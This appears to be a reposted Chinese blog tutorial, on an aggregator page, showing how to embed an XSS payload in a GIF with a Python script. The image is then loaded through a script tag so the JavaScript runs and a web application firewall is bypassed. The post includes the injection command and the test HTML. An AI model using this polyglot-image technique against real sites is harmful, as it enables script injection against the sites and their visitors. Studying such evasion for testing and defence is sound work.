美文网首页
通过图片触发XssPayload从而绕过WAF

通过图片触发XssPayload从而绕过WAF

作者: _saulGoodman_ | 来源:发表于2019-10-05 11:04 被阅读0次

假设如果XSS的PayLoad被拦截,那么把XSS的PayLoad放到载体里面,这样会不会Bypass呢?

一个正常的gif图片加上一个XSS的PayLoad,然后通过脚本将XssPayload注入到图片里面:

利用Python脚本将PayLoad注入到图片里面

python jsingif.py -i hack.gif "javascript:alert('Power_Liu')"

图片

然后用记事本打开图片看看:


图片

可以看出:图片末尾有这样一串代码:*/=1;javascript:alert('Power_Liu');
为了验证这个XSS是否生效,这里用到Html测试代码:

<html>
<head>
<title>Power_Liu—Test-XSS</title>
</head>
<body>
    <img src="hack.gif"\>
    <script src= "hack.gif"> </script>
</body>
</html> 
</html>

打开后的testxss.html:


图片

script标签把图片当成JavaScript代码执行了,因为我们把乱码的数据通过多行注释/**/给注释掉了,所以JavaScript会执行我们的PayLoad,这样可以绕过WAF

By:Power_Liu
Qq:211124332
文章地址:博客
)

相关文章

  • 通过图片触发XssPayload从而绕过WAF

    假设如果XSS的PayLoad被拦截,那么把XSS的PayLoad放到载体里面,这样会不会Bypass呢? 一个正...

  • 利用ASP.NET中的x-up-devcap-post-char

    以前我发表过几篇利用编码技术绕过WAF的文章。在文章中我不仅介绍了绕过WAF的方法,还明确指出WAF产品可以通过拦...

  • SQL注入专题(三)

    一、WAF及绕过WAF原理介绍 WAF的定义: waf,即web应用防火墙,是通过执行一系列针对http/http...

  • 🎪waf绕过

    ? waf注入绕过检测方法 云waf直接找真实ip就可绕过 方法总结:绕过waf的方法: 1、白名单绕过2、大小写...

  • 绕过waf

    绕过云锁进行SQL注入 EXP: 1.php?id=-1 union(select 1,2,3,@@datadir...

  • WAF绕过

    一、WAF简介 WAF(WebApplicationFirewall)也称:网站应用级入侵防御系统,是通过执行一系...

  • web渗透测试中WAF绕过讲解(三)规则层面的绕过注入

    0x01 前言 对于渗透测试人员来说掌握绕过各类WAF是一项重要的基本技能而WAF又分云WAF、硬件WAF...

  • XSS绕过WAF

    http://www.freebuf.com/articles/web/54686.html

  • 绕过waf方法

    一、各种编码绕过 id=1 union select pass from admin limit 1 id=1%2...

  • 绕过waf方法

    参考:绕过WAF、安全狗知识整理 - 珍惜少年时 - 博客园 SQL注入 | 9种绕过Web应用程序防火墙的方式 ...

网友评论

      本文标题:通过图片触发XssPayload从而绕过WAF

      本文链接:https://www.haomeiwen.com/subject/dmvepctx.html